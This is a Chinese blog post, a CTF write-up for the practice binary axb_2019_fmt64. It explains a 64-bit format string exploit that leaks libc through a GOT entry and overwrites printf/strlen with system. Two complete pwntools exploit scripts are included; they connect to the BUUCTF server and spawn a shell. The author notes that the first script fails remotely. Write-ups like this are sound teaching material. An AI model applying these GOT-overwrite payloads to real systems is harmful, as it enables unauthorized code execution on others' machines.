<!DOCTYPE html>
<html lang="zh-Hans">

<head>
  <meta http-equiv="content-type" content="text/html; charset=utf-8">
<meta name="x5-fullscreen" content="true">
<meta name="full-screen" content="yes">
<meta name="theme-color" content="#317EFB" />
<meta content="width=device-width, initial-scale=1.0, maximum-scale=5.0, user-scalable=0" name="viewport">
<meta name="description" content="axb_2019_fmt64前言：本来这道题很简单的，但是还是写了我好长时间，为什么我本地是打通了，但是为什么远程是打不通的，这就很难理解了。 题目1.首先还是checksec一下  只开启nx保护，RELRO部分开启，证明got表可写。 2.ida反编译  这里有一个非常明显的格式化字符串漏洞 3.接着找一下偏移，可以看到偏移是8  下面可以泄露libc基址了，计算system一开始打算libc">
<meta property="og:type" content="article">
<meta property="og:title" content="axb_2019_fmt64">
<meta property="og:url" content="https://www.imalun.com/2025/07/17/axb-2019-fmt64/index.html">
<meta property="og:site_name" content="Hexo">
<meta property="og:description" content="axb_2019_fmt64前言：本来这道题很简单的，但是还是写了我好长时间，为什么我本地是打通了，但是为什么远程是打不通的，这就很难理解了。 题目1.首先还是checksec一下  只开启nx保护，RELRO部分开启，证明got表可写。 2.ida反编译  这里有一个非常明显的格式化字符串漏洞 3.接着找一下偏移，可以看到偏移是8  下面可以泄露libc基址了，计算system一开始打算libc">
<meta property="og:locale">
<meta property="og:image" content="https://www.imalun.com/img/404.jpg">
<meta property="og:image" content="https://www.imalun.com/img/404.jpg">
<meta property="og:image" content="https://www.imalun.com/img/404.jpg">
<meta property="og:image" content="https://www.imalun.com/img/404.jpg">
<meta property="og:image" content="https://www.imalun.com/img/404.jpg">
<meta property="og:image" content="https://www.imalun.com/img/404.jpg">
<meta property="og:image" content="https://www.imalun.com/img/404.jpg">
<meta property="og:image" content="https://www.imalun.com/img/404.jpg">
<meta property="og:image" content="https://www.imalun.com/img/404.jpg">
<meta property="og:image" content="https://www.imalun.com/img/404.jpg">
<meta property="og:image" content="https://www.imalun.com/img/404.jpg">
<meta property="article:published_time" content="2025-07-17T08:12:31.000Z">
<meta property="article:modified_time" content="2025-10-25T17:40:38.689Z">
<meta property="article:author" content="enp0">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://www.imalun.com/img/404.jpg">


<title >axb_2019_fmt64</title>

<!-- Favicon -->

    <link href='/favicon-16x16.png?v=2.2.6' rel='icon' type='image/png' sizes='16x16' ></link>


    <link href='/favicon-32x32.png?v=2.2.6' rel='icon' type='image/png' sizes='32x32' ></link>


    <link href='/apple-touch-icon.png?v=2.2.6' rel='apple-touch-icon' sizes='180x180' ></link>


    <link href='/site.webmanifest' rel='manifest' ></link>


<!-- Plugin -->




    
<link rel="stylesheet" href="/css/plugins/bootstrap.row.css">

    
<link rel="stylesheet" href="https://npm.elemecdn.com/@fancyapps/ui@4.0/dist/fancybox.css">

    
    




<!-- Icon -->

    
<link rel="stylesheet" href="/css/plugins/font-awesome.min.css">




<!-- Variable -->
<script>window.ASYNC_CONFIG = {"hostname":"www.imalun.com","author":"enp0","root":"/","typed_text":["沉浸在二进制海洋里的二进制狗"],"theme_version":"2.2.6","theme":{"switch":true,"default":"style-light"},"favicon":{"logo":"log.png","icon16":"favicon-16x16.png","icon32":"favicon-32x32.png","apple_touch_icon":"apple-touch-icon.png","webmanifest":"/site.webmanifest","visibilitychange":true,"hidden":"failure.ico","show_text":"欢迎各位✌莅临指导","hide_text":"(●—●)喔哟，崩溃啦！"},"i18n":{"placeholder":"搜索文章...","empty":"找不到您查询的内容: ${query}","hits":"找到 ${hits} 条结果","hits_time":"找到 ${hits} 条结果（用时 ${time} 毫秒）","author":"本文作者：","copyright_link":"本文链接：","copyright_license_title":"版权声明：","copyright_license_content":"本博客所有文章除特别声明外，均默认采用 undefined 许可协议。","copy_success":"复制成功","copy_failure":"复制失败","open_read_mode":"进入阅读模式","exit_read_mode":"退出阅读模式","notice_outdate_message":"距离上次更新已经 undefined 天了, 文章内容可能已经过时。","sticky":"置顶","just":"刚刚","min":"分钟前","hour":"小时前","day":"天前","month":"个月前"},"swup":false,"plugin":{"flickr_justified_gallery":"https://npm.elemecdn.com/flickr-justified-gallery@latest/dist/fjGallery.min.js"},"icons":{"sun":"far fa-sun","moon":"far fa-moon","play":"fas fa-play","email":"far fa-envelope","next":"fas fa-arrow-right","calendar":"far fa-calendar-alt","clock":"far fa-clock","user":"far fa-user","back_top":"fas fa-arrow-up","close":"fas fa-times","search":"fas fa-search","reward":"fas fa-hand-holding-usd","toc_tag":"fas fa-th-list","read":"fas fa-book-reader","arrows":"fas fa-arrows-alt-h","double_arrows":"fas fa-angle-double-down","copy":"fas fa-copy","user_tag":"fas fa-user-alt"},"icontype":"font","highlight":{"plugin":"highlighjs","theme":true,"copy":true,"lang":false,"title":"default","height_limit":200},"toc":{"post_title":false},"live_time":{"start_time":"07/10/2025 17:00:00","prefix":"博客已萌萌哒运行 undefined 天"},"danmu":{"enable":false,"el":".trm-banner"},"covers":["/%E3%80%90%E5%93%B2%E9%A3%8E%E5%A3%81%E7%BA%B8%E3%80%91%E4%B8%AD%E4%B8%96%E7%BA%AA-%E5%AD%A4%E7%8B%AC%E7%9A%84%E5%A5%B3%E5%AD%A9.png","/%E3%80%90%E5%93%B2%E9%A3%8E%E5%A3%81%E7%BA%B8%E3%80%91%E5%A2%A8%E4%BE%A0%E5%AE%A2%E8%A1%8C-%E6%8F%92%E7%94%BB.png","/%E3%80%90%E5%93%B2%E9%A3%8E%E5%A3%81%E7%BA%B8%E3%80%91%E5%8D%A1%E6%AF%94-%E6%95%B0%E5%AD%97%E8%89%BA%E6%9C%AF-%E6%B0%B4.png","/%E3%80%90%E5%93%B2%E9%A3%8E%E5%A3%81%E7%BA%B8%E3%80%91%E4%B8%A4%E7%A7%8D%E8%89%B2%E8%B0%83%E7%9A%84%E5%A4%B4%E5%8F%91-%E5%8A%A8%E6%BC%AB%E5%A5%B3%E5%AD%A9.pmg","/%E3%80%90%E5%93%B2%E9%A3%8E%E5%A3%81%E7%BA%B8%E3%80%91Chris%E6%8F%92%E7%94%BB-%E6%8F%92%E7%94%BB.png","/%E3%80%90%E5%93%B2%E9%A3%8E%E5%A3%81%E7%BA%B8%E3%80%91WLOP-%E7%89%B9%E5%86%99.png","/%E3%80%90%E5%93%B2%E9%A3%8E%E5%A3%81%E7%BA%B8%E3%80%91%E5%B8%BD%E5%AD%90-%E6%89%8B%E5%A5%97-%E7%94%B5%E5%BD%B1%E4%BA%BA%E7%89%A9.png"]};</script>
<script id="async-page-config">window.PAGE_CONFIG = {"isPost":true,"isHome":false,"postUpdate":"2025-10-26 01:40:38"};</script>

<!-- Theme mode css -->
<link data-swup-theme rel="stylesheet" href="/css/index.css?v=2.2.6" id="trm-switch-style">
<script>
    let defaultMode = ASYNC_CONFIG.theme.default !=='auto' ?  ASYNC_CONFIG.theme.default : (window.matchMedia("(prefers-color-scheme: light)").matches ? 'style-light' : 'style-dark')
    let catchMode = localStorage.getItem('theme-mode') || defaultMode;
    let type = catchMode === 'style-dark' ? 'add' : 'remove';
    document.documentElement.classList[type]('dark')
</script>

<!-- CDN -->


    
    



<!-- Site Analytics -->


     

    

    
 
<meta name="generator" content="Hexo 7.3.0"></head>

<body>

  <!-- app wrapper -->
  <div class="trm-app-frame">

    <!-- page preloader -->
    <div class="trm-preloader">
    <div class="trm-holder">
        <div class="preloader">
            <div></div>
            <div></div>
            <div></div>
            <div></div>
            <div></div>
            <div></div>
            <div></div>
            <div></div>
            <div></div>
            <div></div>
        </div>
    </div>
</div>
    <!-- page preloader end -->

    <!-- change mode preloader -->
    <div class="trm-mode-swich-animation-frame">
    <div class="trm-mode-swich-animation">
        <i class="i-sun"><i class="iconfont far fa-sun"></i></i>
        <div class="trm-horizon"></div>
        <i class="i-moon"><i class="iconfont far fa-moon"></i></i>
    </div>
</div>
    <!-- change mode preloader end -->

      <!-- scroll container -->
      <div id="trm-dynamic-content" class="trm-swup-animation">
        <div id="trm-scroll-container" class="trm-scroll-container" style="opacity: 0">
            <!-- top bar -->
            <header class="trm-top-bar">
	<div class="container">
		<div class="trm-left-side">
			<!-- logo -->
<a href="/" class="trm-logo-frame trm-anima-link">
    
        <img alt="logo" src="/log.png">
    
    
        <div class="trm-logo-text">
            enp0的个人博客<span></span>
        </div>
    
</a>
<!-- logo end -->
		</div>
		<div class="trm-right-side">
			<!-- menu -->
<div class="trm-menu">
    <nav>
        <ul>
            
            <li class="menu-item-has-children ">
                <a  href="/" target="">
                    首页
                </a>
                
                <ul>
                    
                    <li>
                        <a  href="/archives2/" target="">
                            archives2
                        </a>
                    </li>
                    
                </ul>
                
            </li>
            
            <li class="menu-item-has-children ">
                <a  href="/archives/" target="">
                    归档
                </a>
                
            </li>
            
            <li class="menu-item-has-children ">
                <a  href="/categories/" target="">
                    分类
                </a>
                
            </li>
            
            <li class="menu-item-has-children ">
                <a  href="/links/" target="">
                    友链
                </a>
                
            </li>
            
        </ul>
    </nav>
</div>
<!-- menu end -->
			
    <!-- mode switcher place -->
    <div class="trm-mode-switcher-place">
        <div class="trm-mode-switcher">
            <i class="iconfont far fa-sun"></i>
            <input class="tgl tgl-light" id="trm-swich" type="checkbox">
            <label class="trm-swich" for="trm-swich"></label>
            <i class="iconfont far fa-moon"></i>
        </div>
    </div>
    <!-- mode switcher place end -->

			
		</div>
		<div class="trm-menu-btn">
			<span></span>
		</div>
	</div>
</header>
            <!-- top bar end -->

            <!-- body -->
            
<div class="trm-content-start">
    <!-- banner -->
    <div class="trm-banner">
    
    <!-- banner cover -->
    <img style="object-position:top;object-fit:cover;" alt="banner" class="trm-banner-cover" src="/images/3.png">
    <!-- banner cover end -->
    

    <!-- banner content -->
    <div class="trm-banner-content trm-overlay">
        <div class="container">
            <div class="row">
                
                <div class="col-lg-4"></div>
                
                <div class="col-lg-8">

                    <!-- banner title -->
                    <div class="trm-banner-text ">
                        <div class="trm-label trm-mb-20">
                            NEWS LETTER
                        </div>
                        <h1 class="trm-mb-30 trm-hsmb-font">
                            axb_2019_fmt64
                        </h1>

                        
                            <ul class="trm-breadcrumbs trm-label">
                                <li>
                                    <a href="/" class="trm-anima-link">Home</a>
                                </li>
                                <li>
                                    <span>
                                        2025
                                    </span>
                                </li>
                            </ul>
                        
                    </div>
                    <!-- banner title end -->

                    <!-- scroll hint -->
                    <span id="scroll-triger" class="trm-scroll-hint-frame">
                        <div class="trm-scroll-hint"></div>
                        <span class="trm-label">Scroll down</span>
                    </span>
                    <!-- scroll hint end -->

                </div>
            </div>
        </div>
    </div>
    <!-- banner content end -->
</div>
    <!-- banner end -->
    <div class="container">
        <div class="row">
            
                <div class="trm-page-sidebar col-lg-4 hidden-sm">
                    <!-- main card -->
                    <div class="trm-main-card-frame trm-sidebar">
    <div class="trm-main-card"> 
        <!-- card header -->
<div class="trm-mc-header">
    <div class="trm-avatar-frame trm-mb-20">
        <img alt="Avatar" class="trm-avatar" src="/touxiang.png">
    </div>
    <h5 class="trm-name trm-mb-15">
        enp0
    </h5>
    
        <div class="trm-label">
            一个
            <span class="trm-typed-text">
                <!-- Words for theme.user.typedText -->
            </span>
        </div>
    
</div>
<!-- card header end -->
        <!-- sidebar social -->

<div class="trm-divider trm-mb-40 trm-mt-40"></div>
<div class="trm-social">
    
        <a href="https://github.com" title="github" rel="nofollow" target="_blank">
            <i class="iconfont fab fa-github"></i>
        </a>
    
        <a href="https://accessible.com" title="gitee" rel="nofollow" target="_blank">
            <i class="iconfont fab fa-accessible-icon"></i>
        </a>
    
        <a href="https://earlybirds.com" title="gitee" rel="nofollow" target="_blank">
            <i class="iconfont fab fa-earlybirds"></i>
        </a>
    
        <a href="https://github.com" title="gitee" rel="nofollow" target="_blank">
            <i class="iconfont far fa-grin-tongue-squint"></i>
        </a>
    
</div>

<!-- sidebar social end -->
        <!-- info -->
<div class="trm-divider trm-mb-40 trm-mt-40"></div>
<ul class="trm-table trm-mb-20">
    
        <li>
            <div class="trm-label">
                地址:
            </div>
            <div class="trm-label trm-label-light">
                火星
            </div>
        </li>
    
        <li>
            <div class="trm-label">
                年龄:
            </div>
            <div class="trm-label trm-label-light">
                18
            </div>
        </li>
    
</ul>
<!-- info end -->

        
    <div class="trm-divider trm-mb-40 trm-mt-40"></div>
    <!-- action button -->
    <div class="text-center">
        <a href="mailto:2209645844@qq.com" class="trm-btn">
            联系我
            <i class="iconfont far fa-envelope"></i>
        </a>
    </div>
    <!-- action button end -->

    </div>
</div>
                    <!-- main card end -->
                </div>
            
            <div class="trm-page-content col-lg-8">
                <div id="trm-content" class="trm-content">
                    <div class="trm-post-info row hidden-sm">
    <div class="col-sm-4">
        <div class="trm-card trm-label trm-label-light text-center">
            <i class="iconfont far fa-calendar-alt trm-icon"></i><br>
            10/26
        </div>
    </div>
    <div class="col-sm-4">
        <div class="trm-card trm-label trm-label-light text-center">
            <i class="iconfont far fa-clock trm-icon"></i><br>
            01:40
        </div>
    </div>
    <div class="col-sm-4">
        <div id="post-author" class="trm-card trm-label trm-label-light text-center">
            <i class="iconfont far fa-user trm-icon"></i><br>
            enp0
        </div>
    </div>
</div>
<div class="trm-card ">
    <article id="article-container" class="trm-publication">
    <h1 id="axb-2019-fmt64"><a href="#axb-2019-fmt64" class="headerlink" title="axb_2019_fmt64"></a>axb_2019_fmt64</h1><h2 id="前言："><a href="#前言：" class="headerlink" title="前言："></a>前言：</h2><p>本来这道题很简单的，但是还是写了我好长时间，为什么我本地是打通了，但是为什么远程是打不通的，这就很难理解了。</p>
<h2 id="题目"><a href="#题目" class="headerlink" title="题目"></a>题目</h2><p>1.首先还是checksec一下</p>
<p><img src="/../images/blog/image-20250717153712346.png" alt="image-20250717153712346"  data-tag='post-image' onload='this.onload=null;this.style.opacity=1;' loading="lazy" onerror='this.onerror=null;this.src="/img/404.jpg"'></p>
<p>只开启nx保护，RELRO部分开启，证明got表可写。</p>
<p>2.ida反编译</p>
<p><img src="/../images/blog/image-20250717153828074.png" alt="image-20250717153828074"  data-tag='post-image' onload='this.onload=null;this.style.opacity=1;' loading="lazy" onerror='this.onerror=null;this.src="/img/404.jpg"'></p>
<p>这里有一个非常明显的格式化字符串漏洞</p>
<p>3.接着找一下偏移，可以看到偏移是8</p>
<p><img src="/../images/blog/image-20250717154028317.png" alt="image-20250717154028317"  data-tag='post-image' onload='this.onload=null;this.style.opacity=1;' loading="lazy" onerror='this.onerror=null;this.src="/img/404.jpg"'></p>
<p>下面可以泄露libc基址了，计算system<br>一开始打算libc是这样泄露的payload &#x3D; p64(puts_got)+”%08$s”,失败了，动调发现被&#x2F;x00截断了，64位都有这个情况，</p>
<p>关于64位格式化字符串利用，可以看这篇文章，建议先看一下这篇文章，64位跟32位的关于格式化字符串漏洞的利用有点不一样。<br><a target="_blank" rel="noopener" href="https://www.anquanke.com/post/id/194458?display=mobile">64位格式化字符串漏洞修改got表利用详解-安全KER - 安全资讯平台</a></p>
<p>这样的话，payload就要修改成如下，补齐8字节，是为了完整的占用一个偏移，给下面的puts_got泄露构造条件</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">payload=<span class="string">b&#x27;%9$s&#x27;</span>.ljust(<span class="number">8</span>,<span class="string">b&#x27;a&#x27;</span>)</span><br><span class="line">payload += p64(puts_got)</span><br></pre></td></tr></table></figure>

<p><img src="/../images/blog/image-20250717154522325.png" alt="image-20250717154522325"  data-tag='post-image' onload='this.onload=null;this.style.opacity=1;' loading="lazy" onerror='this.onerror=null;this.src="/img/404.jpg"'></p>
<p>可以看到puts的libc地址泄露出来了</p>
<p>现在计算libc基址</p>
<p><img src="/../images/blog/image-20250717154609396.png" alt="image-20250717154609396"  data-tag='post-image' onload='this.onload=null;this.style.opacity=1;' loading="lazy" onerror='this.onerror=null;this.src="/img/404.jpg"'></p>
<p>x&#x2F;gx计算偏移</p>
<p><img src="/../images/blog/image-20250717154646384.png" alt="image-20250717154646384"  data-tag='post-image' onload='this.onload=null;this.style.opacity=1;' loading="lazy" onerror='this.onerror=null;this.src="/img/404.jpg"'></p>
<p>下面就是将printf的地址修改为system的got地址，具体exp如下:</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br></pre></td><td class="code"><pre><span class="line">libc_base = puts_addr - <span class="number">0x6f5d0</span></span><br><span class="line">system = libc_base + libc.symbols[<span class="string">&#x27;system&#x27;</span>] - <span class="number">16</span></span><br><span class="line"></span><br><span class="line">log_addr(<span class="string">&#x27;libc_base&#x27;</span>)</span><br><span class="line">log_addr(<span class="string">&#x27;system&#x27;</span>)</span><br><span class="line"></span><br><span class="line">low = system &amp; <span class="number">0xffff</span> </span><br><span class="line">high = (system &gt;&gt; <span class="number">16</span>) &amp; <span class="number">0xff</span></span><br><span class="line"></span><br><span class="line"></span><br><span class="line">payload = <span class="string">&#x27;%&#x27;</span> + <span class="built_in">str</span>(high-<span class="number">9</span>) + <span class="string">&#x27;c%12$hhn&#x27;</span></span><br><span class="line">payload += <span class="string">&#x27;%&#x27;</span> + <span class="built_in">str</span>(low-high) + <span class="string">&#x27;c%13$hn&#x27;</span></span><br><span class="line">payload = payload.encode().ljust(<span class="number">32</span>, <span class="string">b&#x27;a&#x27;</span>) + p64(printf_got+<span class="number">2</span>) + p64(printf_got)</span><br><span class="line"></span><br><span class="line"><span class="comment"># p.recvuntil(&#x27;Please tell me:&#x27;)</span></span><br><span class="line">sleep(<span class="number">0.1</span>)</span><br><span class="line">p.send(payload)</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<p>这里的偏移我是瞎写的，但是在栈中是可以看到正确的偏移的，所以这里的正确偏移是12，13</p>
<p><img src="/../images/blog/image-20250717160418118.png" alt="image-20250717160418118"  data-tag='post-image' onload='this.onload=null;this.style.opacity=1;' loading="lazy" onerror='this.onerror=null;this.src="/img/404.jpg"'></p>
<p><img src="/../images/blog/image-20250717160405666.png" alt="image-20250717160405666"  data-tag='post-image' onload='this.onload=null;this.style.opacity=1;' loading="lazy" onerror='this.onerror=null;this.src="/img/404.jpg"'></p>
<p>至于这里为什么是system-16，在调试中发现printf修改的是system+16的地址，直接减16就好。</p>
<p><img src="/../images/blog/image-20250717160804043.png" alt="image-20250717160804043"  data-tag='post-image' onload='this.onload=null;this.style.opacity=1;' loading="lazy" onerror='this.onerror=null;this.src="/img/404.jpg"'></p>
<p>很奇怪为什么我手搓改的是正确的，但是不对，这个效果是正确的，在本地是可以打通的，难以理解了。正确的exp可以看Albert Kesselring师傅的exp。</p>
<p><img src="/../images/blog/image-20250717161055812.png" alt="image-20250717161055812"  data-tag='post-image' onload='this.onload=null;this.style.opacity=1;' loading="lazy" onerror='this.onerror=null;this.src="/img/404.jpg"'></p>
<h2 id="exp"><a href="#exp" class="headerlink" title="exp"></a>exp</h2><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> tools <span class="keyword">import</span> *</span><br><span class="line"><span class="keyword">from</span> time <span class="keyword">import</span> *</span><br><span class="line"></span><br><span class="line">context(os=<span class="string">&#x27;linux&#x27;</span>,arch=<span class="string">&#x27;amd64&#x27;</span>,log_level=<span class="string">&#x27;debug&#x27;</span>)</span><br><span class="line"></span><br><span class="line">p=process(<span class="string">&#x27;./fmt64&#x27;</span>)</span><br><span class="line"><span class="comment"># p=remote(&#x27;node5.buuoj.cn&#x27;,26591)</span></span><br><span class="line">elf = ELF(<span class="string">&quot;./fmt64&quot;</span>)</span><br><span class="line">libc = ELF(<span class="string">&quot;./buu16-64.so&quot;</span>)</span><br><span class="line"></span><br><span class="line">sprintf_got = elf.got[<span class="string">&#x27;sprintf&#x27;</span>]</span><br><span class="line">printf_got = elf.got[<span class="string">&#x27;printf&#x27;</span>]</span><br><span class="line">puts_got = elf.got[<span class="string">&#x27;puts&#x27;</span>]</span><br><span class="line">strlen_got = elf.got[<span class="string">&#x27;strlen&#x27;</span>]</span><br><span class="line"></span><br><span class="line">payload=<span class="string">b&#x27;%9$s&#x27;</span>.ljust(<span class="number">8</span>,<span class="string">b&#x27;a&#x27;</span>)</span><br><span class="line">payload += p64(puts_got)</span><br><span class="line"></span><br><span class="line">p.recvuntil(<span class="string">&quot;Please tell me:&quot;</span>)</span><br><span class="line">p.send(payload)</span><br><span class="line"></span><br><span class="line">p.recvuntil(<span class="string">&#x27;Repeater:&#x27;</span>)</span><br><span class="line"><span class="comment"># sleep(0.1)</span></span><br><span class="line"><span class="comment"># puts_addr =u64(p.recvuntil(&quot;\x7f&quot;).ljust(8,b&quot;\x08&quot;))</span></span><br><span class="line">leak = p.recv(<span class="number">6</span>)  <span class="comment"># 通常64位地址前6字节足够</span></span><br><span class="line">puts_addr = u64(leak.ljust(<span class="number">8</span>, <span class="string">b&#x27;\x00&#x27;</span>))</span><br><span class="line">log_addr(<span class="string">&#x27;puts_addr&#x27;</span>)</span><br><span class="line"><span class="comment"># debug(p)</span></span><br><span class="line"></span><br><span class="line">libc_base = puts_addr - <span class="number">0x6f5d0</span></span><br><span class="line">system = libc_base + libc.symbols[<span class="string">&#x27;system&#x27;</span>] - <span class="number">16</span></span><br><span class="line"></span><br><span class="line">log_addr(<span class="string">&#x27;libc_base&#x27;</span>)</span><br><span class="line">log_addr(<span class="string">&#x27;system&#x27;</span>)</span><br><span class="line"></span><br><span class="line">low = system &amp; <span class="number">0xffff</span> </span><br><span class="line">high = (system &gt;&gt; <span class="number">16</span>) &amp; <span class="number">0xff</span></span><br><span class="line"></span><br><span class="line"></span><br><span class="line">payload = <span class="string">&#x27;%&#x27;</span> + <span class="built_in">str</span>(high-<span class="number">9</span>) + <span class="string">&#x27;c%12$hhn&#x27;</span></span><br><span class="line">payload += <span class="string">&#x27;%&#x27;</span> + <span class="built_in">str</span>(low-high) + <span class="string">&#x27;c%13$hn&#x27;</span></span><br><span class="line">payload = payload.encode().ljust(<span class="number">32</span>, <span class="string">b&#x27;a&#x27;</span>) + p64(printf_got+<span class="number">2</span>) + p64(printf_got)</span><br><span class="line"></span><br><span class="line"><span class="comment"># p.recvuntil(&#x27;Please tell me:&#x27;)</span></span><br><span class="line">sleep(<span class="number">0.1</span>)</span><br><span class="line">p.send(payload)</span><br><span class="line"></span><br><span class="line">sleep(<span class="number">0.1</span>)</span><br><span class="line">payload3 = <span class="string">&#x27;;/bin/sh\x00&#x27;</span></span><br><span class="line"></span><br><span class="line">p.sendafter(<span class="string">&quot;Please tell me:&quot;</span>,payload3)</span><br><span class="line"><span class="comment"># p.send(&#x27;;/bin/sh\x00&#x27;)</span></span><br><span class="line"></span><br><span class="line">sleep(<span class="number">0.1</span>)</span><br><span class="line"><span class="comment"># p.sendline(&#x27;ls&#x27;)</span></span><br><span class="line"><span class="comment"># p.sendline(&#x27;cat flag&#x27;)</span></span><br><span class="line"></span><br><span class="line">p.interactive()</span><br><span class="line"></span><br><span class="line">p.close()</span><br></pre></td></tr></table></figure>

<p>效果图：</p>
<p><img src="/../images/blog/image-20250717153625167.png" alt="image-20250717153625167"  data-tag='post-image' onload='this.onload=null;this.style.opacity=1;' loading="lazy" onerror='this.onerror=null;this.src="/img/404.jpg"'></p>
<h2 id="Albert-Kesselring师傅的exp"><a href="#Albert-Kesselring师傅的exp" class="headerlink" title="Albert Kesselring师傅的exp"></a>Albert Kesselring师傅的exp</h2><p>这里附上Albert Kesselring师傅的exp，师傅还是太强大了，这个exp远程可以打通的</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line">context.arch=<span class="string">&#x27;amd64&#x27;</span></span><br><span class="line">p=remote(<span class="string">&#x27;node5.buuoj.cn&#x27;</span>,<span class="number">26619</span>)</span><br><span class="line"><span class="comment">#p=process(&#x27;./axb_2019_fmt64&#x27;)</span></span><br><span class="line">elf = ELF(<span class="string">&quot;./axb_2019_fmt64&quot;</span>)</span><br><span class="line">libc=ELF(<span class="string">&#x27;/home/gwht/Downloads/libc6_2.23-0ubuntu11_amd64.so&#x27;</span>)</span><br><span class="line"><span class="comment">#libc=ELF(&#x27;/lib/x86_64-linux-gnu/libc.so.6&#x27;)</span></span><br><span class="line">payload=<span class="string">b&#x27;ZXD%11$s^%12$s^%13$s----&#x27;</span>+p64(elf.got[<span class="string">&#x27;memset&#x27;</span>])+p64(elf.got[<span class="string">&#x27;read&#x27;</span>])+p64(elf.got[<span class="string">&#x27;sprintf&#x27;</span>])</span><br><span class="line"><span class="comment">#gdb.attach(p)</span></span><br><span class="line"><span class="comment">#pause()</span></span><br><span class="line">p.send(payload)</span><br><span class="line">p.recvuntil(<span class="string">&#x27;ZXD&#x27;</span>)</span><br><span class="line">memset=u64(p.recvn(<span class="number">6</span>).ljust(<span class="number">8</span>,<span class="string">b&#x27;\x00&#x27;</span>))</span><br><span class="line">p.recvn(<span class="number">1</span>)</span><br><span class="line">read=u64(p.recvn(<span class="number">6</span>).ljust(<span class="number">8</span>,<span class="string">b&#x27;\x00&#x27;</span>))</span><br><span class="line">p.recvn(<span class="number">1</span>)</span><br><span class="line">sprintf=u64(p.recvn(<span class="number">6</span>).ljust(<span class="number">8</span>,<span class="string">b&#x27;\x00&#x27;</span>))</span><br><span class="line">log.success(<span class="built_in">hex</span>(memset))</span><br><span class="line">log.success(<span class="built_in">hex</span>(read))</span><br><span class="line">log.success(<span class="built_in">hex</span>(sprintf))</span><br><span class="line">libc_addr=sprintf-libc.sym[<span class="string">&#x27;sprintf&#x27;</span>]</span><br><span class="line">log.success(<span class="built_in">hex</span>(libc_addr))</span><br><span class="line">system=libc_addr+libc.sym[<span class="string">&#x27;system&#x27;</span>]</span><br><span class="line">log.success(<span class="built_in">hex</span>(system))</span><br><span class="line">payload=fmtstr_payload(<span class="number">8</span>,&#123;elf.got[<span class="string">&#x27;strlen&#x27;</span>]:libc_addr+libc.sym[<span class="string">&#x27;system&#x27;</span>]&#125;,numbwritten=<span class="number">9</span>)</span><br><span class="line"><span class="comment">#payload=&#x27;1145141919810&#x27;</span></span><br><span class="line"><span class="comment">#gdb.attach(p)</span></span><br><span class="line"><span class="comment">#pause()</span></span><br><span class="line">p.send(payload)</span><br><span class="line">payload=<span class="string">&#x27;;$0;cat flag&#x27;</span></span><br><span class="line">p.send(payload)</span><br><span class="line"></span><br><span class="line">p.interactive()</span><br></pre></td></tr></table></figure>

</article>
    
    <div class="trm-reward">
        
            <span class="trm-reward-btn trm-glow" onclick='var qr = document.getElementById("qr"); qr.style.display = (qr.style.display === "none") ? "block" : "none";'>
                <i class="iconfont fas fa-hand-holding-usd"></i>
            </span>
        
        <p class="trm-reward-comment">I'm so cute. Please give me money.</p>
        <div id="qr" style="display:none;">
            
                <div style="display:inline-block">
                    <a rel="noopener noreferrer" href='zhifubao.png' target='_blank' >
                       <img src="/zhifubao.png" alt="支付宝" loading="lazy">
                    </a>
                    <p>支付宝</p>
                </div>
            
                <div style="display:inline-block">
                    <a rel="noopener noreferrer" href='weixin.png' target='_blank' >
                       <img src="/weixin.png" alt="微信" loading="lazy">
                    </a>
                    <p>微信</p>
                </div>
            
        </div>
    </div>

    

<ul class="trm-post-copyright">
    <li class="trm-post-copyright-author">
        <strong>本文作者：</strong>
        enp0
    </li>
    <li class="trm-post-copyright-link">
        <strong>本文链接：</strong>
